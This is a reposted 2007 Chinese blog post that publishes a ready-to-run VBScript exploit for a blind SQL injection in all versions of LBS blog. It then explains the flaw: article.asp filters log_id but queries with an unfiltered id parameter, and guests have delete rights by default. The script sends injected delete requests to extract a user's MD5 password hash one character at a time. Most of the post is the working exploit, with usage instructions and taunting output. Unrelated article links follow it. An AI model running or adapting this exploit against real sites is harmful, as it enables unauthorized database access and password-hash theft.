编程 Javascript

LBS blog sql注射漏洞[All version]-官方已有补丁

Posted in Javascript onAugust 26, 2007

呵呵,只是证明下漏洞存在
exp如下,保存为vbs,自己下个程序测试自己吧

'From 剑心
'============================================================================
'使用说明：
' 在命令提示符下：
' cscript.exe lbsblog.vbs 要攻击的网站的博客路径有效的文章id 要破解的博客用户密码
'如：
' cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1 1
' by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML 'XMLHTTP对象用来打开目标网址
Dim TargetURL '目标网址
Dim userid,articleid '博客用户名
Dim TempStr '存放已获取的部分 MD5密码
Dim CharHex '定义16进制字符
Dim charset

Set oArgs = WScript.arguments
If oArgs.count < 1 Then Call ShowUsage()

Set olbsXML = createObject("Microsoft.XMLHTTP")

'补充完整目标网址
TargetURL = oArgs(0)
If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL=TargetURL & "article.asp"

articleid=oArgs(1)
userid=oArgs(2)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")

WScript.echo "LBS blog All version Exploit"&vbcrlf
WScript.echo "By 剑心"&vbcrlf
WScript.echo "http://www.loveshell.net/ Just For fun :)"&vbcrlf&vbcrlf
WScript.echo "+Fuck the site now"&vbcrlf

Call main(TargetURL,BlogName)

Set oBokeXML = Nothing

'----------------------------------------------sub-------------------------------------------------------
'============================================
'函数名称：main
'函数功能：主程序，注入获得blog 用户密码
'============================================
Sub main(TargetURL,BlogName)
Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
postdata = ""
postdata = articleid &" and (select left(user_password,"&MainOffset&") from blog_user where user_id=" & userid & ")='" & TempStr&CharHex(SubOffset) &"'"

OpenURL = TargetURL

olbsXML.open "Post",OpenURL, False, "", ""
olbsXML.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
olbsXML.send "act=delete&id="& escape(postdata)
GetPage = BytesToBstr(olbsXML.ResponseBody)
'判断访问的页面是否存在
If InStr(GetPage,"deleted")<>0 Then
'"博客用户不存在或填写的资料有误" 为错误标志，返回此标志说明猜解的 MD5 不正确
'如果得到 0000000000000000 的 MD5 值，请修改错误标志
ElseIf InStr(GetPage,"permission")<>0 Then
TempStr=TempStr & CharHex(SubOffset)
WScript.Echo "+Crack now："&TempStr
Exit for
Else
WScript.echo vbcrlf & "Something error" & vbcrlf
WScript.echo vbcrlf & GetPage& vbcrlf
WScript.Quit
End If
next
Next
WScript.Echo vbcrlf& "+We Got It：" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil"
End sub

'============================================
'函数名称：BytesToBstr
'函数功能：将XMLHTTP对象中的内容转化为GB2312编码
'============================================
Function BytesToBstr(body)
dim objstream
set objstream = createObject("ADODB.Stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function

'============================
'函数名称：ShowUsage
'函数功能：使用方法提示
'============================
Sub ShowUsage()
WScript.echo " LBS blog Exploit" & vbcrlf & " By Loveshell/剑心"
WScript.echo "Usage:"& vbcrlf & " CScript " & WScript.ScriptFullName &" TargetURL BlogName"
WScript.echo "Example:"& vbcrlf & " CScript " & WScript.ScriptFullName &" http://www.loveshell.net/ 1 1"
WScript.echo ""
WScript.Quit
End Sub

漏洞说明:

src_article.asp中的
......
input["log_id"]=func.checkInt(input["log_id"]);
if(!input["id"]){
strError=lang["invalid_parameter"];
}else{
// Check if the article exists
theArticle.load("log_id, log_authorID, log_catID","log_id="+input["id"]);
strError=false;
}
......

过滤的是log_id,但是使用的确实id,呵呵 :)

然后呢?
class/article.asp中的代码
this.load = function(strselect, strwhere){
var tmpA=connBlog.query("select TOP 1 "+strselect+" FROM [blog_Article] where "+strwhere);
if(tmpA){
this.fill(tmpA[0]);
return true;
}else{
return false;
}
}

上面不用说了吧,呵呵.不过触发要条件的,看能满足不哦!

function articledelete(){
if(theUser.rights["delete"]<1){
// Check User Right - without DB Query
pageHeader(lang["error"]);
redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:window.history.back();", false, "errorbox");
}else{
var theArticle=new lbsArticle();
var strError;

默认情况下guest都有删除权限的,尽管后面还做了判断,但是注入已经发生,而我们正好利用他的判断注射,呵呵

LBS blog sql注射漏洞[All version]-官方已有补丁

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Javascript 相关文章推荐

如何在标题栏显示框架内页面的标题

Feb 03 Javascript

JXTree对象，读取外部xml文件数据，生成树的函数

Apr 02 Javascript

firefox事件处理之自动查找event的函数（用于onclick=foo()）

Aug 05 Javascript

使用Mootools动态添加Css样式表代码,兼容各浏览器

Dec 12 Javascript

Javascript基础教程之for循环

Jan 18 Javascript

微信企业号开发之微信考勤Cookies的使用

Sep 11 Javascript

jQuery动画效果图片轮播特效

Jan 12 Javascript

妙用Bootstrap的 popover插件实现校验表单提示功能

Aug 29 Javascript

Node.js操作redis实现添加查询功能

May 25 Javascript

js屏蔽退格键(backspace或者叫后退键与F5)

Feb 10 Javascript

jQuery创建折叠式菜单

Jun 15 jQuery

Vue实现兄弟组件间的联动效果

Jan 21 Javascript

javascript下操作css的float属性的特殊写法

Aug 22 #Javascript

ASP中用Join和Array，可以加快字符连接速度的代码

Aug 22 #Javascript

可以把编码转换成 gb2312编码lib.UTF8toGB2312.js

Aug 21 #Javascript

lib.utf.js

Aug 21 #Javascript

javascript实现上传图片前的预览（TX的面试题）

Aug 20 #Javascript

fix-ie5.js扩展在IE5下不能使用的几个方法

Aug 20 #Javascript

关于恒等于（===）和非恒等于（!==）

Aug 20 #Javascript

You might like

安健A254立体声随身听的分析与打磨

2021/03/02 无线电

smtp邮件发送一例

2006/10/09 PHP

php 文件上传实例代码

2012/04/19 PHP

Smarty的配置与高级缓存技术分享

2012/06/05 PHP

php的ajax简单实例

2014/02/27 PHP

Cygwin中安装PHP方法步骤

2015/07/04 PHP

linux下php上传文件注意事项

2016/06/11 PHP

javascript 延迟加载技术(lazyload)简单实现

2011/01/17 Javascript

浅谈javascript事件取消和阻止冒泡

2015/05/26 Javascript

学习JavaScript设计模式(链式调用)

2015/11/26 Javascript

javascript中闭包概念与用法深入理解

2016/12/15 Javascript

Angular.js中定时器循环的3种方法总结

2017/04/27 Javascript

微信小程序之前台循环数据绑定

2017/08/18 Javascript

jQuery实现表格冻结顶栏效果

2017/08/20 jQuery

vue 数组和对象不能直接赋值情况和解决方法(推荐)

2017/10/25 Javascript

vue项目中axios使用详解

2018/02/07 Javascript

35个最好用的Vue开源库(史上最全)

2019/01/03 Javascript

vue从一个页面跳转到另一个页面并携带参数的解决方法

2019/08/12 Javascript

[01:45]绝对公平！DOTA2队长征召模式详解

2014/04/25 DOTA

[01:07:34]DOTA2-DPC中国联赛定级赛 RNG vs Aster BO3第二场 1月9日

2021/03/11 DOTA

Python深入学习之对象的属性

2014/08/31 Python

Python对象体系深入分析

2014/10/28 Python

Python中map,reduce,filter和sorted函数的使用方法

2015/08/17 Python

Python中字符串的处理技巧分享

2016/09/17 Python

Python-opencv 双线性插值实例

2020/01/17 Python

用什么库写 Python 命令行程序(示例代码详解)

2020/02/20 Python

用python计算文件的MD5值

2020/12/23 Python

使用HTML5和CSS3制作一个模态框的示例

2018/03/07 HTML / CSS

英国团购网站：Groupon英国

2017/11/28 全球购物

美国花园雕像和家居装饰网上商店：Design Toscano

2019/03/09 全球购物

Servlet如何得到服务器的信息

2015/12/22 面试题

大学生自我鉴定范文

2013/12/28 职场文书

会计专业导师推荐信

2014/03/08 职场文书

2014年五四青年节演讲比赛方案

2014/04/22 职场文书

升级 Win11 还是坚守 Win10？微软 Win11 新系统缺失功能大盘点

2022/04/05 数码科技

一文搞懂Java中的注解和反射

2022/06/21 Java/Android